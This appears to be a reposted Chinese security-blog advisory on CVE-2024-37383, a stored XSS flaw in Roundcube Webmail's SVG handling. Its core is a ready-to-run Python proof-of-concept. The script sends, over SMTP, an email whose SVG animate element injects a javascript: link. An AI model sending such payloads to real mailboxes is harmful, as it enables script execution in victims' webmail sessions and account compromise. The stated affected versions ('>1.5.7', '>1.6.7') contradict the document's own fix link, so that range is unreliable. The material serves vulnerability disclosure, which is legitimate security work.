CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)

admin 2024年11月3日00:08:21评论160 views字数 2164阅读7分12秒阅读模式

0x00 前言

Roundcube Webmail是一个开源的基于web的电子邮件客户端,旨在提供用户友好的界面和强大的功能,使用户能够通过web浏览器方便地访问和管理他们的电子邮件。

Roundcube支持标准的邮件协议(如IMAP和SMTP),并提供了许多常见的邮件功能,如收发邮件、管理联系人、创建日历事件等。其界面简洁直观,易于使用,同时还支持插件扩展,用户可以根据自己的需求定制功能。

Roundcube Webmail被广泛应用于个人用户、企业和组织,为他们提供了一个方便、安全的电子邮件管理解决方案。

0x01 漏洞描述

在Roundcube Webmail中发现了CVE-2024-37383漏洞。这是一个存储的XSS漏洞,允许攻击者在用户页面上执行JavaScript代码。

错误出现在处理电子邮件正文标记中的SVG元素的代码中。在显示电子邮件之前,Roundcube会处理某些标签的内容及其属性。

0x02 CVE编号

CVE-2024-37383

0x03 影响版本

Roundcube Webmail >1.5.7

Roundcube Webmail >1.6.7

0x04 漏洞详情

POC:

https://github.com/bartfroklage/CVE-2024-37383-POC

import smtplib
import argparse
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2024-37383 Proof Of Concept")
    parser.add_argument("-e", "--sender_email", required=True, help="Sender's email address")
    parser.add_argument("-p", "--sender_password", required=True, help="Sender's email password")
    parser.add_argument("-t", "--recipient_email", required=True, help="Recipient's email address")
    parser.add_argument("-sh", "--smtp_host", default="smtp.gmail.com", help="SMTP host address")
    parser.add_argument("-sp", "--smtp_port", default=587, help="SMTP port number")

    args = parser.parse_args()

    msg = MIMEMultipart('alternative')
    msg["From"] = args.sender_email
    msg["To"] = args.recipient_email
    msg["Subject"] = "CVE-2024-37383 Proof Of Concept"

    text = "Please use HTML view to see this email."
    html = """\
    <html>
    <head></head>
    <body>
        <svg>
            <animate attributeName="href " values="javascript:alert(\'You are powned.\')" href="#link" />
            </animate>
            <a id="link">
                <text x=20 y=20>Click me</text>
            </a>
        </svg>
    </body>
    </html>
    """
    msg.attach(MIMEText(text, 'plain'))
    msg.attach(MIMEText(html, 'html'))

    try:
        server = smtplib.SMTP(args.smtp_host, args.smtp_port)
        server.set_debuglevel(True)
        server.starttls()
        server.login(args.sender_email, args.sender_password)
        server.sendmail(args.sender_email, args.recipient_email, msg.as_string())
        server.quit()
        print("Email sent successfully.")
    except Exception as e:
        print("An error occurred:", str(e))

CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)

0x05 参考链接

https://github.com/roundcube/roundcubemail/commit/43aaaa528646877789ec028d87924ba1accf5242

https://github.com/roundcube/roundcubemail/releases/tag/1.5.7

 

原文始发于微信公众号(信安百科):CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月3日00:08:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)https://cn-sec.com/archives/3348660.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息